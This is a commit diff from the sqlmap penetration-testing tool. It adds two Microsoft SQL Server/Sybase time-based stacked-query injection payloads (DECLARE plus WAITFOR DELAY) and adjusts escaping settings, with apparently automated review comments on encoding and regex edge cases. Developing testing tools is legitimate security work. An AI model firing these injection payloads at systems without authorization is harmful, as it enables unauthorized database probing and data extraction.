
Commit cb170f1

committed
Implements sqlmapproject#3780
1 parent 5650e1a commit cb170f1


3 files changed

+46
-3
lines changed


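--- a/data/xml/payloads/stacked_queries.xml
+++ b/data/xml/payloads/stacked_queries.xml
@@ -268,6 +268,28 @@
 </details>
 </test>
 
+<test>
+<title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
+<stype>4</stype>
+<level>2</level>
+<risk>1</risk>
+<clause>1-8</clause>
+<where>1</where>
+<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+<request>
+<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+<comment>--</comment>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
 <test>
 <title>Microsoft SQL Server/Sybase stacked queries</title>
 <stype>4</stype>
@@ -289,6 +311,27 @@
 </details>
 </test>
 
+<test>
+<title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
+<stype>4</stype>
+<level>5</level>
+<risk>1</risk>
+<clause>1-8</clause>
+<where>1</where>
+<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+<request>
+<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
 <test>
 <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
 <stype>4</stype>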
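Review bot: The binary literal `0x303a303a3[SLEEPTIME]` in both new `<vector>`/`<payload>` lines spells `0:0:` followed by exactly one ASCII digit (0x30-0x39), so the two added tests are only well-formed while [SLEEPTIME] is a single character; a `--time-sec` of 10 or more produces `0x303a303a310`, an odd-length literal that SQL Server will not read as `0:0:10`, whereas a quoted `'0:0:[SLEEPTIME]'` form (which the settings change in this commit suggests the file already uses elsewhere) has no such limit. The `CHAR(9)` declaration itself is wide enough for a two-digit value, so the constraint sits in the hex encoding, not the variable. I would record that in the XML so the next person raising the sleep time or cloning these tests sees it, e.g. `<!-- 0x303a303a3[SLEEPTIME] is '0:0:<digit>'; valid only for single-digit sleep times -->` above each added `<test>`, or have the engine skip these two tests when the configured sleep time is not a single digit.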

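--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -18,7 +18,7 @@
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.6.53"
+VERSION = "1.3.6.54"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -420,7 +420,7 @@
 MAX_ERROR_CHUNK_LENGTH = 1024
 
 # Do not escape the injected statement if it contains any of the following SQL keywords
-EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
+EXCLUDE_UNESCAPE = ("WAITFOR DELAY '", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
 
 # Mark used for replacement of reflected values
 REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"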
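Review bot: Narrowing the first `EXCLUDE_UNESCAPE` entry from `"WAITFOR DELAY "` to `"WAITFOR DELAY '"` means an unquoted `WAITFOR DELAY @x` statement is no longer matched by that entry; the payloads added in this same commit still bypass escaping only because they also contain `DECLARE `, which stays in the tuple. That coupling is worth stating next to the tuple so a later `WAITFOR DELAY @var` payload written without DECLARE does not silently start being escaped: `# unquoted 'WAITFOR DELAY @var' forms are matched by the "DECLARE " entry, not this one`. I cannot see where EXCLUDE_UNESCAPE is consumed from this hunk, so the effect of escaping such a payload is inferred from the comment above the line rather than observed.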

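--- a/plugins/generic/syntax.py
+++ b/plugins/generic/syntax.py
@@ -26,7 +26,7 @@ def _escape(expression, quote=True, escaper=None):
 if quote:
 for item in re.findall(r"'[^']*'+", expression):
 original = item[1:-1]
-if original:
+if original and re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. '[SLEEPTIME]' marker
 replacement = escaper(original) if not conf.noEscape else original
 
 if replacement != original: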
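Review bot: The new guard on the `if original and re.search(...)` line skips escaping for any quoted string that merely contains `[SLEEPTIME` or `[RAND` anywhere in it, not only the bare marker the trailing comment describes, and the pattern is left unclosed, so it also matches any other bracketed name beginning with `RAND`. If the bare marker is the only intended case, anchor the pattern, e.g. `re.search(r"^\[(SLEEPTIME|RAND\w*)\]$", original) is None`; if embedded markers such as `'0:0:[SLEEPTIME]'` are meant to be covered too, the comment should say so explicitly, since from this hunk I cannot tell which quoted forms reach `_escape` after the EXCLUDE_UNESCAPE filter. The `RAND\w*` is a guess at what `RAND` is meant to cover, as the marker set is not visible here. Stylistically `not re.search(...)` reads more naturally than `re.search(...) is None`. `_escape`'s body continues past the hunk on both sides.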
